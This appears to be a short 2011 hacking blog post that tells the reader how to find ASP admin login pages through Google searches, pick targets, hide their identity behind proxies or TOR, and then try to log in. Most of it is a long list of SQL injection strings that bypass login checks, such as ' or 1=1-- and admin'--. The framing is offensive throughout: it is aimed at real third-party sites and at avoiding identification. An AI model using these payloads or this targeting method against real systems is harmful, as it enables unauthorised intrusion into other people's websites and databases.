2011-10-01

Webagedon - Dark Lord of All!

SQL Injection Strings:
1. Google search "admin login.asp" - be creative, use Google hacking tips to "fine tune" your searches.

2. On the results, pick interesting subjects.

3. at this time you should think about hiding your identity.  Look into Proxy servers available on the internet:
www.youhide.com
https://kproxy.com/
 -or you might want to invest some time with TOR.

4. After you have verified that you can not be identified, you can then proceed with your academic endeavor.

SQL Strings you can try:
username: admin
password: 1'or'1'='1

SQL Injection 101, Login tricks
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
more...

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a to come later...